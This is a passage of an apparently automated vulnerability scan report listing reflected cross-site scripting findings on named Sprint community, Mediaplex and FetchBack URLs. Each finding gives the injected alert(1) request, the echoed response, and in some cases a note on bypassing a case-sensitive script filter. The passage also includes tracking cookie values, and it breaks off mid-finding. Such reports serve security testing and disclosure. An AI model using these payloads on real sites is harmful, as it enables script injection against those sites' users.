...[SNIP]...

5.43. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49680"%3balert(1)//4dc0b3f35fc was submitted in the REST URL parameter 3. This input was echoed as 49680";alert(1)//4dc0b3f35fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /baw/community/buzzaboutwireless49680"%3balert(1)//4dc0b3f35fc/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:36 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129929 t=1315099176570665
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless49680";alert(1)//4dc0b3f35fc/general/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip
...[SNIP]...

5.44. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=130149 t=1315099175310012
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.45. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:44 GMT
Server: Apache-Coyote/1.1
X-JAL: 11
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=453971 t=1315099184012772
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.46. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f30"%3balert(1)//0d70885b912 was submitted in the REST URL parameter 4. This input was echoed as 35f30";alert(1)//0d70885b912 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /baw/community/buzzaboutwireless/general35f30"%3balert(1)//0d70885b912/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=217937 t=1315099185636976
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/general35f30";alert(1)//0d70885b912/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.47. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:25 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=121050 t=1315099165474445
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.48. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba4c"%3balert(1)//4747f9a3021 was submitted in the REST URL parameter 3. This input was echoed as 4ba4c";alert(1)//4747f9a3021 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /baw/community/sprintblogs4ba4c"%3balert(1)//4747f9a3021/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:26 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129521 t=1315099166685309
Connection: close
Content-Length: 40559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ar profileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs4ba4c";alert(1)//4747f9a3021/buzz-by-sprint/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerError
...[SNIP]...

5.49. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcde9"%3balert(1)//a061888315 was submitted in the REST URL parameter 4. This input was echoed as bcde9";alert(1)//a061888315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /baw/community/sprintblogs/buzz-by-sprintbcde9"%3balert(1)//a061888315/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=199323 t=1315099175395176
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ngTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs/buzz-by-sprintbcde9";alert(1)//a061888315/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.50. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=162814 t=1315099174017960
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66de4'%3balert(1)//23d1f4a63b3 was submitted in the mpck parameter. This input was echoed as 66de4';alert(1)//23d1f4a63b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D35795102566de4'%3balert(1)//23d1f4a63b3&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4598
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=35795102566de4';alert(1)//23d1f4a63b3" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a59"-alert(1)-"3dcd426b95b was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4592
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck =
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e5e"%3balert(1)//5a3f34f4b67 was submitted in the mpvc parameter. This input was echoed as c6e5e";alert(1)//5a3f34f4b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/c6e5e"%3balert(1)//5a3f34f4b67 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4785'%3balert(1)//c24c09353c6 was submitted in the mpvc parameter. This input was echoed as a4785';alert(1)//c24c09353c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/a4785'%3balert(1)//c24c09353c6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:35 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/a4785';alert(1)//c24c09353c6http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025" target="_blank">
...[SNIP]...

5.55. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73ced"-alert(1)-"46bd39e34f8 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097677_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.56. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c23"-alert(1)-"d0a07ccec42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315097683_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.57. http://imp.fetchback.com/serve/fb/adtag.js [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3517f"-alert(1)-"f1d43df6b5a was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
